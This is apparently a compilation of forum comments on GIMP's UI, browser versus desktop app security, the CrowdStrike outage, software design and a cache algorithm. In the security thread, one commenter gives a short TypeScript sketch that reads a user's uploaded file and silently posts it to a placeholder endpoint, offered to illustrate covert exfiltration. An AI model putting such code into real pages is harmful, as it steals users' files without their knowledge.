I use Gimp from time to time, and often get frustrated with its... unique UI. It's nice to see they're hearing feedback and working on it :D
A tip for others who feel the same: if you've used Photoshop before and are used to its UI, try the free Photopea website. It's a Photoshop "clone" that works really well in the browser (I believe it's a single developer building it, too). It's replaced Gimp for me lately.
> Websites[...] can sneakily copy the files you are working with
You have made one of the most baffling logical errors that commonly crop up when people criticize browser-based apps.
Browser-based apps execute in a sandbox. They are more constrained in what they can do in comparison to a traditional program running on your machine. Any nefarious thing a browser-based app can do, a local program can do too, and not just that: it can do it in a way that's much harder to detect and/or counteract.
There are good reasons available if you want to criticize browser-based apps. This is not one of them.
i can remove network access capabilities from a desktop app after it is installed. i can't easily do that with an app running in a browser.
likewise monitoring and detecting network access per application is easy. tracking down which browser tab is making which network connection is a lot harder.
i am using that already. at least in firefox the network tab only shows which destinations generate traffic. it does not show which tab the traffic comes from. since any page can connect to multiple destinations, not just the one where the page is loaded from, this is not enough to identify the culprit.
you are not wrong on the comparison but you miss the tools available to contain a desktop application that are not available for a browser application. by default a browser application is more limited than a desktop application, but those limitations also reduce the possible functionality of a browser application, and they are locked in place as far as i am aware.
for a desktop application, at least on linux there are tools available to further constrain its access to the system by monitoring its activity, removing capabilities or placing the app in a container or even a VM. (VMs are available on windows and mac too, but i don't know about the other features)
to contain a browser app in this way i would have to run a contained copy of the browser as a whole, and i still can't easily limit network access.
further, almost all desktop applications on linux come from a trusted source or a trusted intermediary and have undergone at least some kind of review, whereas browser applications can be reviewed but it is non-trivial to ascertain that i am running the exact same version that was reviewed.
it is possible, and it is my hope, for all this to change. i actually believe browser applications are a good idea, but the ability to audit and constrain browser applications needs to improve a lot for that to happen.
I am not sure about your level of computer literacy, so sorry in advance if I give an overly detailed response.
Certainly a website is allowed to process files you upload to it, and its javascript is allowed to make XMLHttpRequests within that sandbox.
This is outside the control of the user, whereas with an app running locally, I could restrict network access or other resources.
Of course the web developer can choose to process the file client side only, but generally when you upload a file to a website, it gets uploaded and processed by their servers.
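To make this concrete, here's a minimal TypeScript sketch (the element id and the endpoint URL are made up, not taken from any real site) of how a page's script can both read a chosen file in the sandbox and quietly POST the same bytes somewhere:

    // Hypothetical page script: #file-input and the endpoint are invented.
    const input = document.querySelector<HTMLInputElement>("#file-input");

    input?.addEventListener("change", async () => {
      const file = input.files?.[0];
      if (!file) return;

      // Read the file inside the sandbox -- the legitimate "client-side" part.
      const bytes = await file.arrayBuffer();

      // ...but nothing stops the same script from also shipping it off.
      await fetch("https://example.com/collect", { method: "POST", body: bytes });
    });

Both branches run inside the sandbox; the sandbox just doesn't distinguish "process locally" from "process locally and also upload".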
Surely you can verify this yourself while using the website, but I am confident that most users of a website wouldn't do that and would be none the wiser about how their data is being processed.
TLDR: I don't believe the average web user is capable of distinguishing a webapp that works in offline-only mode from an ordinary website.
> I am not sure about your level of computer literacy, so sorry in advance if I give an overly detailed response
In technical discussions, this is what I call "The Move". It comes from a desire to position the person making The Move as more knowledgeable and experienced and therefore correct and the other person as relatively new, inexperienced, lacking in wisdom, and naive. It's extremely sophomoric and perversely favored by those who lack the attributes they're trying to project. Don't do it.
I know how browsers and web apps work. I'm a former Mozillian, and among other things, I wrote, edited, and maintained the JS docs on developer.mozilla.org.
Even aside from The Move, nothing else that you wrote out here is especially relevant. The central observation I made is that users have more reason to be circumspect of non-browser based programs that they download and run than they do of browser-based programs because any nefarious thing a browser-based app can do, a native executable can do, too—or worse.
Anyone who has a gut feeling to the contrary is doing exactly that: operating on vibes and intuition and trying to reason with their gut instead of using actual reason to do what is ultimately a straightforward calculation.
(And the thing is, you and everyone else in your camp already knows the truths I've written out here. If you disagree, then we'll set aside one day a year that we'll call Native App Day. For Native App Day, browsers will refuse to execute browser-based apps. Instead everyone who publishes a web app will agree to publish programs packaged in the native executable format for Mac, Windows, and Linux, and everyone who typically uses the web app will run these executables with the same alacrity they apply when they undertake to use the web app. This will be strictly enforced, and there will be no cheating by folks who just refuse to use the computer on Native App Day.)
>> I am not sure about your level of computer literacy, so sorry in advance if I give an overly detailed response
> In technical discussions, this is what I call "The Move". It comes from a desire to position the person making The Move as more knowledgeable and experienced and therefore correct and the other person as relatively new, inexperienced, lacking in wisdom, and naive. It's extremely sophomoric and perversely favored by those who lack the attributes they're trying to project. Don't do it.
Nonsense. Judging from your previous post, it is apparent you are speaking outside of your expertise. Smearing labels around rather than responding factually only makes it more apparent.
You claimed sandboxed browser apps were "more secure" than a traditional app.
Nobody suggested otherwise. In fact, we weren't discussing the browser sandbox security model up to that point, but the differences between an online-only closed-source web app and a traditional FOSS app.
> I know how browsers and web apps work.
So do the lot of us here, yet you don't seem to share a common understanding of the domain.
You do have a skewed understanding of web apps and seem to fail to understand why people would want a traditional app they could inspect and lock down as they please.
This suggests to me that you are junior and/or suffering from a bit of Dunning-Kruger, because you might be skilled in other areas (in this case skilled in web dev and unskilled in traditional app dev), hence my previous comment about your skill level.
You responded to a lengthy post I made, and yet you failed to address any of the points raised.
> The central observation I made
... was questioned by me and others, and you just ignored what was said.
> And the thing is, you and everyone else in your camp already knows the truths I've written out here.
Get off your high horse.
You haven't shared any truths, you haven't addressed the issues we raised, and you have a rather rude tone, saying things like:
> You have made one of the most baffling logical errors that commonly crop up when people criticize browser-based apps.
Krita works well for me on Linux, but I get a lot of random crashes and weird graphics issues on Mac, so it's not worth it there for me. No idea about Windows.
There are habits, sure, but GIMP also just has a lot of bad UI. For instance, if you insert text, you have to click exactly on the black region of a character to select the text. This is really awkward because it means that when you click on a letter to try to move some text, sometimes your click will go through the hole in the middle of the letter and select the thing behind the text. Also worth noting that this update is the one that finally allows people to edit rotated text, and it took 20+ years. This is really bad UI/UX.
That's interesting. I have used and enjoyed a ton of software in different domains (from nothingreal shake to gnu ed), and so far gimp still wins the gold medal for triggering me. A rare feat.
Many years ago, I lost my work because of this "unique UI" and pledged never to use Gimp again unless its behavior changed.
When you open a non-Gimp file, for instance a PNG, and you want to update the source file, you need to "export" to PNG. And if you close the tab, Gimp warns you that your work isn't saved, because it hasn't been saved in its native xcf format. There is no way to know if the work has been saved to the original file. At least, that was the behavior at the time.
So I had opened a dozen (versioned) PNG files, modified them, then overwritten the PNG files. On closing, Gimp warned me that none of the images was saved. I ignored the warning since I didn't want to track the changes in xcf files. It turned out one of the files had not been "exported" to PNG.
This is standard behavior in pretty much any kind of art/content creation app. You have a project file which can be saved and reopened in the app, saving the state of the layers/effects/etc to be edited later, and can “export” a final render to a specific format for your medium. Image/video editing, digital audio workstations, 3D-modeling programs, they all behave like this, for good reason since it usually takes a long time to export to a specific format, and when you do, you lose the ability to change anything.
Think of it like source code, and each exportable file type is like a compilation target.
This is one of the weirder design changes that Gimp made, and it wasn't always that way. IIRC, the "save" option worked as you described in 2.0 but changed to the newer behaviour in either 2.2 or 2.4. Baffling because it really does change the workflow and coupled with the GTK+ load/save dialog boxes, it really has become much less intuitive than it used to be.
There is literally an "overwrite file" command in the file menu.
You didn't lose data because of bad UI but because you are illiterate. You just said it: it warns you. If you can't understand what "none of the images was saved" means, there is no UI that can save you except autosave. But autosave is something you clearly don't want in a photo/image editor; even smartphone apps do not autosave photo edits.
Photoshop has autosave that works well, even for files with hundreds of layers, so it can be done. That being said, I can see that it's less useful when someone chooses not to save.
As for export, a single-layer file should be considered saved when one exports to lossless. A multi-layer file needs a different prompt, and I note Gimp has that now. It flags the file as "Exported to xxxxxx.png" in the Quit dialog.
Autosave is useful for a working-file format like psd, if non-destructive changes are supported. But it would be stupid for an exported end-result format like jpeg, png, webp or pdf, where changes cannot be recorded.
Yes, even though I never use Photoshop and have used Gimp for over 15 years, it's a frustrating UI. I dislike it. Non-destructive editing is a big upgrade though.
I also use Photopea from time to time. Can recommend.
If only some madman would make a Photopea/Photoshop clone open source, then everyone (who has the skills) would be able not only to use a decent open source image editor, but one that could be fully customized to their needs.
It takes more time than reading the article, but the podcast has, IMO, a nice pace of leaving you curious while giving you info. It includes opinions from teachers, parents, etc.
"in the future, the fastest humans on the planet might be a quadrupedal runner at the 2048 Olympics, which may be achieved by shifting up to the rotary gallop and taking longer strides with wide sagittal trunk motion."
> They protect these many companies, industries and even countries at such a global scale and you haven't even heard of them in the last 15 years of their operation
I certainly don't want to know (through disaster news) about the construction company that built the bridge I drive across every day, not for another 15 years, not ever!
This kind of software simply should not fail, with such a massive install base in so many sensitive industries. We're better than that; the software industry is starting to mature, and there are simple and widely-known procedures that could have been used to prevent this.
I have no idea how CrowdStrike stock has only dropped 10%, to its value of 2 months ago. Actually, if these are the only financial troubles you get into, I take back what I said: software should be failing a lot (why spend money on robustness when you don't lose money on bugs?)
working in software, you should know how insanely complex software is. even google, amazon, microsoft, cloudflare and such have outages. mistakes happen because humans are involved. it is the nature and risk of depending on complex systems. bridges by comparison are not that complicated.
I actually expected their stock to drop a lot more than this, but it goes to show you how valuable they are. Investors know that any dip is only temporary because no one is getting rid of CrowdStrike.
Think of the security landscape as early-90s New York City at night, and CrowdStrike as the big bulky guy with lots of guns who protects you for a fee. If he makes a mistake and hurts you, you will be mad, but in the end your need for protection does not suddenly go away, and it was a one-time mistake.
In the 3-4 decades of the security industry, testing signature files to see if they trigger a corner case system crash has never been practiced. You and others are proclaiming yourselves to be experts in an area of technology you have no experience in. This was not a software update!!
Then that's 3-4 decades of massive incompetence, isn't it? "Testing before pushing an update" is basic engineering, they have a huge scale so huge responsibility, and they have the money to perform the tests and hire people who aren't entirely stupid. That's gross malpractice.
testing is for software, not for content. you test and fuzz the software that processes the updates, not the content files themselves. it's like a post on HN crashing HN and you claiming HN should have tested each post before allowing it to be displayed. you test code, not data, and I dare you to back up any claim that data processed by software should also be tested in the same way. Everyone is suddenly an expert in AV content updates lol.
I used to work for Microsoft in a team adjacent to the Defender team that worked on signature updates and I know for sure that these were tested before being rolled out - I saw the Azure Devops pipelines they used to do this. If other companies aren't doing this then that's their incompetence but be assured that it's not industry-wide.
I'm not saying they don't test them; I'm saying they don't do code tests, as in unit tests and all that. I have no idea what they do, I'm just speculating here, but if in fact they do no testing at all, then I agree that would be pretty bad. I would think their testing would be for how well it detects things and/or performance impact, and I'd expect deployment to be automated (i.e.: test cases are passing = gets deployed). I guess they don't have a "did the system crash" check in their pipelines? In your experience at MS, did they test for system/sensor availability impact?
A config file IS code. And yes, even a post can theoretically break a site (SQL injection, say), so if you're pushing data to a million PCs you'd better be testing it.
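To be concrete about what "testing it" could look like (this is only a sketch of the idea, not how CrowdStrike's pipeline actually works; the parser and file name are invented): feed the candidate content file through the same parsing code the deployed agent runs, and block the release if that code blows up.

    import { readFileSync } from "fs";

    // Stand-in for the real production parser of signature/content files.
    function loadContentFile(bytes: Buffer): void {
      if (bytes.length === 0) throw new Error("empty content file");
      // ... real parsing/validation would go here ...
    }

    const candidate = readFileSync("channel-update.bin");
    try {
      loadContentFile(candidate);
      console.log("content file parsed cleanly, OK to release");
    } catch (err) {
      console.error("content file rejected:", err);
      process.exit(1);
    }

The same idea scales up to booting a canary machine with the new file and checking that it stays up.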
You're right, but "testing" could mean anything, you'd need to have the foresight to anticipate the config crashing the program. Is it common to test for that scenario with config files?
Moseley and Marks' "Out of the Tar Pit" is a nice essay / paper.
Ousterhout's "A Philosophy of Software Design" is in the same vein; not an essay, but a short book.
Both of these agree on something that I really relate with: the main thing to keep in mind in a software project is complexity.
Managing complexity to reduce cognitive load on programmers is something I always have in mind, it works not only within a codebase, but also across codebases that talk to each other through APIs, and even across software teams when considering their boundaries and modes of communication.
I watched it again and read the algorithm description part, and I think you're right - D should have been switched to false, as the hand was pointing to it when a cache miss happened.
The behavior is inconsistent with what happens to A and B at the very beginning.
Whenever the hand skips a visited node in search of an unvisited one, it must flip it to unvisited.
If D were given this special treatment every time the hand cycles around, it would forever stay in the cache even if never accessed (D-plomatic immunity?)
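For what it's worth, here is the eviction rule as I read it, as a small TypeScript sketch (the names are mine, not from the video):

    type Entry = { key: string; visited: boolean };

    // On a cache miss: the hand walks forward, clearing the visited bit of
    // every visited entry it passes, and evicts the first unvisited entry
    // it reaches. The clearing step is the flip D should have received.
    function evictOne(cache: Entry[], hand: number): number {
      while (cache[hand].visited) {
        cache[hand].visited = false;
        hand = (hand + 1) % cache.length;
      }
      cache.splice(hand, 1);                  // evict the unvisited entry
      return hand < cache.length ? hand : 0;  // where the hand points next
    }

Skipping that clearing step is exactly what would grant an entry the "immunity" above.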
I'm not that knowledgeable in this department, but: if the BDFL is really hurting the usability of their library / service, can't it just be forked by more benevolent actors?
A basic KVM switch [0]. Got tired of switching my mouse, keyboard and monitor cables between my work laptop and my desktop PC. This makes it a 1 button press.
During the day the desktop PC is off and I work on my laptop; then I turn the laptop off and switch to the desktop PC. With Synergy, one of them would always have to be on.